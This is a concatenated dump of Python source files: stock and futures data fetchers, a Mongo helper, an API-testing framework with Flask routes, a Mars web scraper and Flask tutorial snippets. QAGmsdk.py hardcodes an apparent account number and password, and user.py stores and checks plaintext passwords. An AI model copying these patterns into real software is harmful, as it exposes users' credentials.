def get_stock_bar(symbol,Type):#实时行情接口
cs=[symbol,Type]
return gt.get_bars(cs)
def get_money_30days(symbol):#30天的资金流量数据
return gt.get_money_30days(symbol)
def get_future_list(id):#分类合约,id = 'dce' id = 'dce.c
return gt.get_future_list(id)
def get_future_symbol(id):#某个品种的全部合约代码
var =get_future_list(id)
return list(var[0].index)
def get_zhuli():#得到主力合约
return gt.get_zhuli()
def get_future_bars(symbol,Type):#期货分钟及日K
cs=[symbol,Type]
return gt.get_future_bars(cs)
def get_future_info(symbol):#期货合约基本信息
return gt.future_info(symbol)
def get_calendar(starttime,endtime):#交易日历
return gt.get_calendar(starttime,endtime)
def get_future_tick(symbol):#期货TICK数据
return gt.get_future_tick(symbol)
```
#### File: QUANTAXIS/QAFetch/QAGmsdk.py
```python
import datetime
from gmsdk import md,to_dict
import pandas as pd
md.init('13382753152','940809')
CFFEX = ['IF','IH','IC','T','TF']
CZCE =['CF','FG','MA','RM','SR','TA','ZC']
SHFE = ['AL','BU','CU','HC','NI','RB','RU','SN','ZN']
DCE=['C','CS','I','J','JD','JM','L','M','P','PP','V','Y']
def mtsymbol_list(symbol_list):
z = len (symbol_list)
ret = ''
for i in range(z):
ret = ret + symbol_list[i] +','
ret = ret[:len(ret)-1]
return ret
def to_pd(var,index):
ret =[]
for i in var:
ret.append(to_dict(i))
ret = pd.DataFrame (ret)
ret = ret.set_index(index)
return ret
def get_shse( ):
var =md.get_instruments('SHSE', 1, 0)
return to_pd(var,'symbol')
def get_szse():
var =md.get_instruments('SZSE', 1, 0)
return to_pd(var,'symbol')
def get_shfe():
var = md.get_instruments('SHFE', 4, 1)
return to_pd(var,'symbol')
def get_dce():
var = md.get_instruments('DCE', 4, 1)
return to_pd(var,'symbol')
def get_czce():
var = md.get_instruments('CZCE', 4, 1)
return to_pd(var,'symbol')
def get_cffex():
var = md.get_instruments('CFFEX', 4, 1)
return to_pd(var,'symbol')
def get_index():
shse = md.get_instruments('SHSE', 3, 1)
shse =to_pd(shse,'symbol')
szse = md.get_instruments('SZSE', 3, 1)
szse =to_pd(szse,'symbol')
return shse.append(szse)
def get_etf():
shse = md.get_instruments('SHSE', 5, 0)
return to_pd(shse,'symbol')
def get_fund():
shse = md.get_instruments('SHSE', 2, 0)
shse =to_pd(shse,'symbol')
szse = md.get_instruments('SZSE', 2, 0)
szse =to_pd(szse,'symbol')
return shse.append(szse)
def get_instruments_by_name(name):#期货接口
var = md.get_instruments_by_name(name)
z = len(var)
for i in range (z):
k = z-1-i
if var[k].is_active == 0:
del var[k]
return to_pd(var,'symbol')
def get_constituents(index_symbol):#指数权重
var = md.get_constituents(index_symbol)
return to_pd(var,'symbol')
def get_financial_index(symbol, t_begin, t_end):
if len(t_begin) < 10 :
t_begin = t_begin + ' 00:00:00'
if len(t_end) < 10 :
t_end = t_end + ' 15:00:00'
var =md.get_financial_index(symbol, t_begin, t_end)
var =to_pd(var,'pub_date')
return var
def get_last_financial_index(symbol_list):
var = md.get_last_financial_index(mtsymbol_list(symbol_list))
var = to_pd(var,'symbol')
return var
def get_share_index(symbol_list):
var = md.get_last_share_index(mtsymbol_list(symbol_list))
var = to_pd(var, 'symbol')
return var
def get_market_index(symbol_list):
var = md.get_last_market_index(mtsymbol_list(symbol_list))
var = to_pd(var, 'symbol')
return var
def get_calendar(exchange, start_time, end_time):
var = md.get_calendar(exchange, start_time, end_time)
ret = []
for i in var:
Date = datetime.datetime.utcfromtimestamp(i.utc_time)
ret.append (Date)
return ret
####md
def tick_topd(var,index):
ret = []
for i in var:
tmp = {}
Date = datetime.datetime.utcfromtimestamp(i.utc_time)
Date = Date + datetime.timedelta(hours=8)
tmp['date'] = Date
tmp['code'] = i.exchange + '.' + i.sec_id
tmp['close'] = i.last_price
tmp['vol'] = i.last_volume
tmp['amount'] = i.last_amount
tmp['opi'] = i.cum_position
tmp['买一价'] = i.bids[0][0]
tmp['买一量'] = i.bids[0][1]
tmp['卖一价'] = i.asks[0][0]
tmp['卖一量'] = i.asks[0][1]
ret.append(tmp)
ret = pd.DataFrame(ret)
ret = ret.set_index(index)
return ret
def get_ticks(symbol, begin_time, end_time):
var = md.get_ticks(symbol, begin_time, end_time)
ret = tick_topd(var,'date')
return ret
def bar_topd(var,index):
ret = []
z = len(var)
for j in range (z):
i =var[j]
tmp = {}
Date = datetime.datetime.utcfromtimestamp(i.utc_time)
Date = Date + datetime.timedelta(hours=8)
tmp['date'] = Date
tmp['code'] = i.exchange + '.' + i.sec_id
tmp['close'] = i.close
tmp['high'] = i.high
tmp['low'] = i.low
tmp['open'] = i.open
tmp['vol'] = i.volume
tmp['amount'] = i.amount
if i.exchange in ['SHSE','SZSE'] :
tmp['adj'] = i.adj_factor
else:
tmp['opi'] = i.position
ret.append(tmp)
ret = pd.DataFrame(ret)
ret = ret.set_index(index)
return ret
def get_bars(symbol, bar_type, begin_time, end_time):
var = md.get_bars(symbol, bar_type, begin_time, end_time)
ret = bar_topd(var,'date')
return ret
def get_dailybars(symbol, begin_time, end_time):
var = md.get_dailybars(symbol, begin_time, end_time)
ret = bar_topd(var,'date')
return ret
def get_last_ticks(symbol_list):
symbol_list = mtsymbol_list(symbol_list)
var = md.get_last_ticks(symbol_list)
ret = tick_topd(var,'code')
return ret
def get_last_bars(symbol_list, bar_type):
symbol_list = mtsymbol_list(symbol_list)
var = md.get_last_bars(symbol_list, bar_type)
ret = bar_topd(var,'code')
return ret
def get_last_dailybars(symbol_list):
symbol_list = mtsymbol_list(symbol_list)
var = md.get_last_dailybars(symbol_list)
ret = bar_topd(var,'code')
return ret
def get_last_n_ticks(symbol, n):
end_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
var = md.get_last_n_ticks(symbol, n, end_time)
ret = tick_topd(var,'date')
return ret
def get_last_n_bars(symbol, bar_type, n):
end_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
VAR = md.get_last_n_bars(symbol, bar_type, n, end_time)
z = len(VAR)
var = []
for i in range(z):
var.append(VAR[z-1-i])
ret = bar_topd(var,'date')
return ret
def get_last_n_dailybars(symbol, n):
end_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
VAR = md.get_last_n_dailybars(symbol, n, end_time)
z = len(VAR)
var = []
for i in range(z):
var.append(VAR[z-1-i])
ret = bar_topd(var,'date')
return ret
```
#### File: Engine/utils/url.py
```python
from hashlib import sha1
from urllib.parse import urlparse, urlencode, urlsplit, urlunsplit, quote
def url_fingerprint(url):
h = sha1()
h.update(url.encode('utf-8'))
return h.hexdigest()
def safe_url(url, remove_empty_query=True):
scheme, netloc, path, query, fragment = urlsplit(url)
if not query:
return url.rstrip('/')
# Sort all the queries
queries = []
for q in query.split('&'):
if '=' not in q:
return url
key, value = q.split('=')
if remove_empty_query and not value:
continue
queries.append((key, value))
queries.sort(key=lambda x: x[0])
query = urlencode(queries)
return urlunsplit((scheme, netloc, path, query, fragment)).rstrip('/')
def base_url(url):
parser = urlparse(url)
return '://'.join((parser.scheme or 'http', parser.netloc))
def main():
url = (safe_url('http://fanyi.baidu.com/translate?jlfal=测试&aldtype=16047&ell='))
print(url)
print(safe_url('https://movie.douban.com/subject/2353023'))
if __name__ == '__main__':
main()
```
#### File: wallstreetCN/spiders/mongodbQuery.py
```python
import pymongo
import json
class querylist(object):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['wsc']
def queryMongodbSame(self,collname,keyname,keycontent):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['wsc']
coll = db[collname]
count = coll.find({keyname:keycontent}).count()
return count
def checkDifferentDatabase(self,col1,col2,keyname1,keyname2,x):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['wsc']
coll1 = db[col1]
coll2 = db[col2]
countnum=0
for url in coll1.find():
urlx=url[keyname1]
print (col2)
print (keyname1)
print (urlx)
count = self.queryMongodbSame(col2,keyname2,urlx)
print (count)
if count == x:
print ('none in the db2')
print (countnum)
else:
print ('already in')
continue
countnum+=1
print (countnum)
print (countnum)
```
#### File: QUANTAXIS/QASU/update_tushare.py
```python
from QUANTAXIS.QAFetch import QATushare
from QUANTAXIS.QAUtil import QA_util_date_stamp,QA_Setting,QA_util_date_valid
import json
import pymongo
import datetime
import re
import time
def QA_update_stock_day(name,startDate,endDate):
data=QATushare.QA_fetch_get_stock_day(name,startDate,endDate)
def QA_update_stock_day_all(code,client):
coll_stocklist=client.quantaxis.stock_list
stock_list=coll_stocklist.find_one()['stock']['code']
coll_stock_day=client.quantaxis.stock_day
for item in stock_list:
#coll.find({'code':str(item)[0:6]}).count()
#先拿到最后一个记录的交易日期
start_date=coll_stock_day.find({'code':str(item)[0:6]})[coll_stock_day.find({'code':str(item)[0:6]}).count()-1]['date']
end_date=str(datetime.date.today())
data=QATushare.QA_fetch_get_stock_day(str(item)[0:6],start_date,end_date)[1::]
coll_stock_day.insert_many(data)
def QA_update_standard_sql():
print('正在整理和更新数据,请稍等.....')
coll=pymongo.MongoClient().quantaxis.stock_day
coll.ensure_index('code')
"""
for item in coll.find():
date=item['date']
date_stamp=QA_util_date_stamp(date)
coll.update({"_id":item['_id']},{'$set':{'date_stamp':date_stamp}})
"""
```
#### File: QUANTAXIS/QASU/user.py
```python
from QUANTAXIS.QAUtil import QA_util_log_info
def QA_user_sign_in(name,password,clients):
coll=clients.quantaxis.user_list
if (coll.find({'username':name,'password':password}).count() >0):
QA_util_log_info('success login! your username is:'+str(name))
return True
else:
QA_util_log_info('Failed to login,please check your password ')
return False
def QA_user_sign_up(name,password,clients):
coll=clients.quantaxis.user_list
if (coll.find({'username':name}).count() >0):
QA_util_log_info('user name is already exist')
else :
coll.insert({'username':name,'password':password})
QA_util_log_info('Success sign in! please login ')
```
#### File: QUANTAXIS/QATask/tasks.py
```python
from celery import Celery
import QUANTAXIS
quantaxis = Celery('tasks', backend='amqp://guest@localhost//', broker='amqp://guest@localhost//')
@quantaxis.task
def save_data(all):
pass
def update_data():
pass
def update_spider(name):
pass
def update_all_spiders():
pass
```
#### File: QUANTAXIS/QAUtil/QASetting.py
```python
from QUANTAXIS.QAUtil import QA_util_log_info,QA_util_sql_mongo_setting
from QUANTAXIS.QASU.user import QA_user_sign_in,QA_user_sign_up
class QA_Setting():
QA_util_sql_mongo_ip='127.0.0.1'
QA_util_sql_mongo_port='27017'
client=QA_util_sql_mongo_setting(QA_util_sql_mongo_ip,QA_util_sql_mongo_port)
QA_setting_user_name=''
QA_setting_user_password=''
user={'username':'','password':'','login':False}
def QA_setting_init(self):
self.client=QA_util_sql_mongo_setting(self.QA_util_sql_mongo_ip,self.QA_util_sql_mongo_port)
self.user=self.QA_setting_login()
def QA_setting_login(self):
self.username=self.QA_setting_user_name
self.password=self.QA_setting_user_password
QA_util_log_info('username:'+str(self.QA_setting_user_name))
result=QA_user_sign_in(self.username,self.password,self.client)
if result==True:
self.user['username']=self.username
self.user['password']=<PASSWORD>
self.user['login']=True
return self.user
else:
QA_util_log_info('failed to login')
```
#### File: QUANTAXIS/QAUtil/QAType.py
```python
from QUANTAXIS.QAUtil.QADate import QA_util_date_valid
def QA_util_ensure_timeSerires(data):
pass
def QA_util_ensure_dict(data):
pass
def QA_util_ensure_date(data):
return QA_util_date_valid(data)
def QA_util_ensure_ms(data):
pass
``` |
{
"source": "52clover/clover",
"score": 2
} |
#### File: clover/core/executor.py
```python
import datetime
from clover.common import friendly_datetime
from clover.core.notify import Notify
from clover.core.logger import Logger
from clover.core.report import Report
from clover.core.request import Request
from clover.core.keyword import Keyword
from clover.core.variable import Variable
from clover.core.validator import Validator
from clover.core.exception import ResponseException
from clover.history.service import HistoryService
class Executor():
def __init__(self, type='trigger'):
self.type = type
# 这个status值为error、failed、skipped或passed,
# 传递给notify用于判断是否需要发送运行结果的通知。
self.status = 'passed'
def _set_status(self, status):
"""
# 考虑到套件内有多个接口和接口有多个断言,程序执行时会动态
# 覆盖掉状态。次函数放置状态被覆盖。
# 状态优先级:error > failed > skipped > passed
# 如果当前状态为failed,传递skipped则状态不被修改。
:param context:
:return:
"""
if self.status == 'error':
return
elif self.status == 'failed':
if status != 'error':
return
self.status = status
elif self.status == 'skipped':
if status not in ['error', 'failed']:
return
self.status = status
else:
self.status = status
def save_interface_run_history(self, trigger, suite, case, validator):
"""
:param trigger:
:param suite:
:param case:
:param validator:
:return:
"""
# 先通过联合主键sid和cid查找接口运行历史,找到则更新
service = HistoryService()
history = {
'suite_id': suite.id,
'interface_id': case.id,
'suite_name': suite.name,
'interface_name': case.name,
'team': case.team,
'project': case.project,
'type': case.type,
'sub_type': case.sub_type,
'success': validator.status == 'passed',
'error': validator.status == 'error',
'failed': validator.status == 'failed',
'skiped': validator.status == 'skiped',
'valid': trigger.trigger != 'clover'
}
return service.create(history)
def execute(self, suite, trigger):
"""
:param suite:
:param trigger:
:return:
"""
# 注意需要在执行最前端实例化report,report初始化时会记录开始时间点。
cookies, report, details = None, Report(), []
"""
# 注意,变量对象必须在循环外被实例化,变量声明周期与执行器相同。
# 使用团队和项目属性查询平台预置的自定义变量,通过触发时传递。
# trigger参数为触发时用户添加的变量,优先级高于平台预置变量。
"""
keyword = Keyword('')
variable = Variable(suite, trigger)
# 因为是类属性存储日志,使用前先清理历史日志数据。
Logger.clear()
Logger.log("团队:{},项目:{}".format(suite.team, suite.project), "开始执行")
for case in suite.cases:
detail = {'name': case.name}
detail.setdefault('start', friendly_datetime(datetime.datetime.now()))
request = Request(case, cookies)
response = None
validator = Validator()
variable.replace_variable(request)
keyword.call_keyword(request, 'before_request')
try:
# 当用例设置跳过时不进行接口请求。
if case.status:
response = request.send_request()
cookies = response.cookies
# 当用例跳过或接口请求异常时,response是None,此时设置elapsed为0
elapsed = response.elapsed if response is not None else 0
detail.setdefault('elapsed', elapsed)
except ResponseException:
Logger.log("请求异常,状态码:{}".format(request.status), "发送请求", 'error')
Logger.log(request.message, "发送请求", 'error')
self._set_status('error')
validator.status = 'error'
validator.verify(case, response, variable)
detail.setdefault('status', validator.status)
detail.setdefault('result', validator.result)
self._set_status(validator.status)
validator.performance(response)
detail.setdefault('threshold', validator.threshold)
detail.setdefault('performance', validator.level)
variable.extract_variable_from_response(case, response)
detail.setdefault('end', friendly_datetime(datetime.datetime.now()))
self.save_interface_run_history(trigger, suite, case, validator)
details.append(detail)
# 这里是调试模式,需要返回数据给前端页面。
if self.type == 'debug':
return 0, "debug", response.get_response()
# print(Logger.logs)
# 存储运行的测试报告到数据库。
data = report.save(suite, trigger, details, Logger)
notify = Notify()
notify.send_message(data, self.status)
```
#### File: clover/core/variable.py
```python
import re
from typing import Text
from clover.core import RESERVED
from clover.core.logger import Logger
from clover.core.request import Request
from clover.core.extractor import Extractor
from clover.models import query_to_dict
from clover.environment.models import VariableModel
class Variable(object):
def __init__(self, case, trigger):
"""
:param case:
:param trigger:
"""
self.team = case.team
self.project = case.project
self.extract = []
if hasattr(trigger, 'variable'):
self.trigger = trigger.variable
else:
self.trigger = []
self.variables = self.load_default_variable()
def load_default_variable(self):
"""
:return:
"""
# 加载通过变量设置页面预置的变量数据。
filter = {
'team': self.team,
'project': self.project
}
default = VariableModel.query.filter_by(**filter).all()
return query_to_dict(default)
@staticmethod
def is_reserved_variable(data):
"""
# 内置变量使用时一般为:
# ${response}.status
# ${response}.header.contenttype
# ${request}.path
# 等,可见内置变量在被引用时在第一个位置
:param data:
:return:
"""
# 这里如果data是空值则不处理。
if not data or not isinstance(data, (Text,)):
return False, None
data = data.split('.')[0]
match = re.search(r'\$\{(\w+?)\}', data)
if match:
variable = match.group(1).strip()
if variable in RESERVED:
return True, variable
else:
return False, None
def derivation(self, data: Text):
"""
:param data:
:return:
"""
# 这里如果data是空值则不处理。
if not data or not isinstance(data, (Text,)):
return data
variables = re.findall(r'\$\{(\w+?)\}', data)
for variable in variables:
if variable:
variable = variable.strip()
# 这里需要注意,变量的优先级是
# 接口上下文变量 > 触发运行时指定变量 > 用户默认配置变量
extract = self.extract
for result in extract:
if variable == result['name']:
data = data.replace('${' + variable + '}', str(result['value']))
trigger = self.trigger
for result in trigger:
if variable == result['name']:
data = data.replace('${' + variable + '}', str(result['value']))
default = self.variables
for result in default:
if variable == result['name']:
data = data.replace('${' + variable + '}', str(result['value']))
return data
def replace_variable(self, request: Request) -> Request:
request.url = self.derivation(request.url)
if request.header:
Logger.log("请求头替换前[{}]".format(request.header), "变量替换")
for key, value in request.header.items():
request.header[key] = self.derivation(value)
Logger.log("请求头替换后[{}]".format(request.header), "变量替换")
if request.parameter:
Logger.log("请求参数替换前[{}]".format(request.parameter), "变量替换")
for key, value in request.parameter.items():
request.parameter[key] = self.derivation(value)
Logger.log("请求参数替换后[{}]".format(request.parameter), "变量替换")
if request.body:
Logger.log("请求体替换前[{}]".format(request.body), "变量替换")
if request.body_mode in ['formdata', 'urlencoded']:
for key, value in request.body.items():
request.body[key] = self.derivation(value)
elif request.body_mode in ['file']:
pass
else:
"""
# 这是"expected string or bytes-like object"问题的一个临时解决方案。
# 原因是当body数据类型为raw,数据为json时,view层接收数据时自动将其转为
# python对象,因此这里进行derivation会报错。
"""
if isinstance(request.body, (list,)):
for key, value in request.body.items():
request.body[key] = self.derivation(value)
else:
request.body = self.derivation(request.body)
Logger.log("请求体替换前[{}]".format(request.body), "变量替换")
return request
def extract_variable_from_response(self, case, response):
"""
:param case:
:param response:
:return:
"""
Logger.log("提取接口间变量", "提取变量")
# 这里是临时加的,这里要详细看下如何处理。
if response is None or not hasattr(response, 'response'):
Logger.log("响应为None或响应无数据。", "提取变量", level='warn')
return
if not hasattr(case, 'extract') or not case.extract:
Logger.log("用例不需要提取变量。", "提取变量", level='warn')
return case
Logger.log("提取接口间变量开始[{}]".format(self.extract), "提取变量")
for extract in case.extract:
# 提取需要进行断言的数据
selector = extract.get('selector', 'delimiter')
extractor = Extractor(selector)
expression = extract.get('expression', None)
variable = extract.get('variable', None)
# 表达式可能包含变量,使用值对变量进行替换。
flag, reserved = self.is_reserved_variable(expression)
if flag:
if reserved == 'response':
index = expression.index('.')
_expression = expression[index + 1:]
if _expression == 'status':
result = response.status
elif _expression == 'elapsed':
result = response.elapsed
elif 'header' in _expression:
expr = _expression.split('.')[-1]
result = response.header.get(expr)
else:
result = extractor.extract(response.response, _expression, '.')
else:
result = extractor.extract(response.response, expression, '.')
"""
# 这里不要简单的append,如果两个变量name相同,value不一样,
# 后面被追加进来的数据不会生效,因此变量在这里要保证唯一性。
"""
for _varibale in self.extract:
if variable == _varibale['name']:
_varibale['value'] = result
break
else:
self.extract.append({'name': variable, 'value': result})
Logger.log("提取接口间变量完成[{}]".format(self.extract), "提取变量")
```
#### File: clover/clover/urls.py
```python
from clover.environment.views import TeamView as Team
from clover.keyword.views import KeywordView as Keyword
from clover.environment.views import VariableView as Variable
from clover.history.views import HistoryView as History
from clover.interface.views import InterfaceView as Interface
from clover.suite.views import SuiteView as Suite
from clover.report.views import ReportView as Report
from clover.index.views import IndexView as Index
from clover.task.views import TaskView as Task
from clover.plugin.views import PluginView as Plugin
def map_urls(app):
# 版本相关路由与视图带增加
# 配置管理相关路由与视图
index = Index.as_view("index")
app.add_url_rule(
"/api/v1/index/info",
view_func=index,
methods=['GET'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/index/count",
view_func=index,
methods=['GET'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/index/config",
view_func=index,
methods=['GET'],
strict_slashes=False,
)
# 配置管理相关路由与视图
team = Team.as_view("team")
app.add_url_rule(
"/api/v1/team/create",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/delete",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/update",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/search",
view_func=team,
methods=['GET'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/aggregate",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/navigation",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
variable = Variable.as_view("variable")
app.add_url_rule(
"/api/v1/variable/create",
view_func=variable,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/variable/delete",
view_func=variable,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/variable/update",
view_func=variable,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/variable/search",
view_func=variable,
methods=['GET'],
strict_slashes=False,
)
# 关键字相关路由与视图
keyword = Keyword.as_view("keyword")
app.add_url_rule(
"/api/v1/keyword/create",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/keyword/delete",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/keyword/update",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/keyword/search",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/keyword/debug",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
# 接口测试相关路由与视图
interface = Interface.as_view("interface")
app.add_url_rule(
"/api/v1/interface/create",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/delete",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/update",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/search",
view_func=interface,
methods=['GET', 'POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/trigger",
view_func=interface,
methods=['GET', 'POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/switch",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/tree",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
# 测试套件相关路由与视图
suite = Suite.as_view("suite")
app.add_url_rule(
"/api/v1/suite/create",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/delete",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/update",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/search",
view_func=suite,
methods=['GET', 'POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/trigger",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/switch",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
# 定时任务相关路由与视图
task = Task.as_view("task")
app.add_url_rule(
"/api/v1/task/create",
view_func=task,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/task/delete",
view_func=task,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/task/update",
view_func=task,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/task/search",
view_func=task,
methods=['get', 'POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/report/trigger",
view_func=task,
methods=['POST'],
strict_slashes=False,
)
# 测试报告相关路由与视图
report = Report.as_view("report")
app.add_url_rule(
"/api/v1/report/delete",
view_func=report,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/report/search",
view_func=report,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/report/log",
view_func=report,
methods=['POST'],
strict_slashes=False,
)
# 插件相关路由与视图
plugin = Plugin.as_view("plugin")
app.add_url_rule(
"/api/v1/plugin/create",
view_func=plugin,
methods=['POST'],
strict_slashes=False,
)
``` |
{
"source": "52Godfrey/Web-Scrape-Challenge",
"score": 4
} |
#### File: 52Godfrey/Web-Scrape-Challenge/scrape_mars.py
```python
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import requests
from webdriver_manager.chrome import ChromeDriverManager
def init_browser():
executable_path = {'executable_path': ChromeDriverManager().install()}
return Browser("chrome", **executable_path, headless=False)
def scrape_info():
browser = init_browser()
# NASA MARRS NEWS
# URL of page to be scraped
url = "https://mars.nasa.gov/news/"
# Retrieve page with Browser
browser.visit(url)
# HTML object
html = browser.html
# Create BeautifulSoup object; parse with 'html.parser'
soup = BeautifulSoup(html, 'html.parser')
# Extract latest News title text
news_title_s = soup.find_all('div', class_="content_title")[1].find("a").text
# Extract latest News paragraph text
news_p_s = soup.find('div', class_="article_teaser_body").text
# Quit browser
browser.quit()
#MARS FACTS
# Use Pandas to scrape the table containing facts about the planet including Diameter, Mass, etc.
# URL of page to be scraped
facts_url = "https://space-facts.com/mars/"
# Use the read_html function in Pandas to automatically scrape any tabular data from a page
facts_tables = pd.read_html(facts_url)
# Slice off any of those dataframes that we want using normal indexing
facts_df = facts_tables[0]
# Rename the columns and set Description column as index
facts_df = facts_df.rename (columns ={0:"Description", 1:"Mars"})
facts_df.set_index("Description", inplace=True)
# Convert the data to a HTML table string
html_table = facts_df.to_html()
# Strip unwanted newlines to clean up the table
html_table = html_table.replace('\n', '')
#MARS HEMISPHERE
# URL of page to be scraped
hem_url = "https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars"
# Retrieve page with the requests module
response = requests.get(hem_url)
# Create BeautifulSoup object; parse with 'lxml'
soup = BeautifulSoup(response.text, 'lxml')
# Examine the results, then determine element that contains sought info
# titles are returned as an iterable list
results = soup.find_all('div', class_='description')
titles = []
# Loop through returned results
for result in results:
title = result.find('h3').text
titles.append(title)
# Examine the results, then determine element that contains sought info
# image urls are returned as an iterable list
img_results = soup.find_all('div', class_='item')
image_urls = []
# Loop through returned results
for result in img_results:
href = result.find('a')['href']
link = 'https://astrogeology.usgs.gov' + href
# Retrieve page with the requests module
response2 = requests.get(link)
# Create BeautifulSoup object; parse with 'lxml'
soup2 = BeautifulSoup(response2.text, 'lxml')
href2 = soup2.find('img', class_='wide-image')['src']
img_url = 'https://astrogeology.usgs.gov' + href2
image_urls.append(img_url)
#Append the dictionary with the image url string and the hemisphere title to a list.
#This list will contain one dictionary for each hemisphere.
hemisphere_image_urls = [
{"title": titles[0], "img_url": image_urls[0]},
{"title": titles[1], "img_url": image_urls[1]},
{"title": titles[2], "img_url": image_urls[2]},
{"title": titles[3], "img_url": image_urls[3]},
]
all_info = {
"latest_news_title": news_title_s,
"latest_news_paragraph": news_p_s,
"mars_fact": html_table,
"mars_hemisphere": hemisphere_image_urls
}
return all_info
``` |
{
"source": "52itsmile/Flask_basics",
"score": 3
} |
#### File: Flask_test/02_day/flask_02_context.py
```python
from flask import Flask
# 请求上下文中的变量
from flask import request
from flask import session
# 应用上下文的变量
from flask import current_app
from flask import g
app = Flask(__name__)
# print(session.get('user_id',''))
@app.route('/')
def index():
print(request.method)
return 'index'
if __name__ == '__main__':
app.run(debug=True)
```
#### File: Flask_test/02_day/flask_02_cookie.py
```python
from flask import Flask
from flask import make_response
from flask import request
app = Flask(__name__)
@app.route('/')
def index():
user_name = request.cookies.get('user_id')
user_id = request.cookies.get('user_name')
return "%s%s"%(user_name,user_id)
@app.route('/login')
def login():
# 默认判断账号与密码是正确的
response = make_response('success')
response.set_cookie('user_id','1',max_age=3600)
response.set_cookie('user_name','laowang',max_age=3600)
return response
@app.route('/logout')
def logout():
# 默认判断账号与密码是正确的
response = make_response('success')
response.delete_cookie('user_id')
response.delete_cookie('user_name')
return response
if __name__ == '__main__':
app.run(debug=True)
```
#### File: Flask_test/02_day/flask_02_gouzifunc.py
```python
from flask import Flask
app = Flask(__name__)
@app.before_first_request
def before_first_request():
"""在第一次请求之前会访问该函数"""
print('before_first_request')
@app.before_request
def before_request():
"""在每次请求之前都会调用"""
print('before_first_request')
#可以对一些非法的请求进行阻止
# 如果ip在黑名单
# 返回 '你在~~~'
@app.after_request
def after_request(response):
# 在请求之后会调用,并且函数里面接受一个参数,:响应,还需要讲响应进行返回
print('after_request')
return response
@app.teardown_request
def teardown_request(error):
# 在请求之后会执行,如果在响应中出现异常,会把具体的异常传入到此函数
print('teardown_request')
print(error)
@app.route('/')
def index():
return 'index'
if __name__ == '__main__':
app.run()
```
#### File: Flask_test/03_day/template.py
```python
from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route('/')
def index():
return 'index'
@app.route('/demo1')
def demo1():
my_name = 'wwww'
my_str = '<script>for (var i;i<=3;i++){alert("哈哈")}</script>'
my_list = [1, 2, 3, 4]
my_dict = {'name':'laowang',
'age':18}
my_dict_list = [
{
'good_name':"大白菜",
'price':10
},
{
'price':20
}
]
return render_template('template.html',
my_name = my_name,
my_dict = my_dict,
my_list = my_list,
my_str = my_str,
my_dict_list = my_dict_list)
# 方式1:使用装饰器添加
@app.template_filter('lireverse')
def do_lireverse(li):
temp = list(li)
temp.reverse()
return temp
# 方式2:直接添加过滤器
app.add_template_filter(do_lireverse,'lireverse')
@app.route('/demo2')
def demo2():
my_list1 = [
{
"id": 1,
"value": "我爱工作"
},
{
"id": 2,
"value": "工作使人快乐"
},
{
"id": 3,
"value": "沉迷于工作无法自拔"
},
{
"id": 4,
"value": "日渐消瘦"
},
{
"id": 5,
"value": "以梦为马,越骑越傻"
}
]
# @app.route('/demo3')
# def demo3():
# return render_template('template.html')
if __name__ == "__main__":
app.run(debug=True)
```
#### File: Flask_test/03_day/tem_test.py
```python
from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route('/')
def index():
return 'index'
@app.route('/demo1')
def demo1():
test_str = 'qwewqerwwtddf'
test_list = [2,3,4,51,85,93]
test_id = 1
test_dict = {
'name':'Tom',
'age':18
}
my_list_color = [
{
"id": 1,
"value": "我爱工作"
},
{
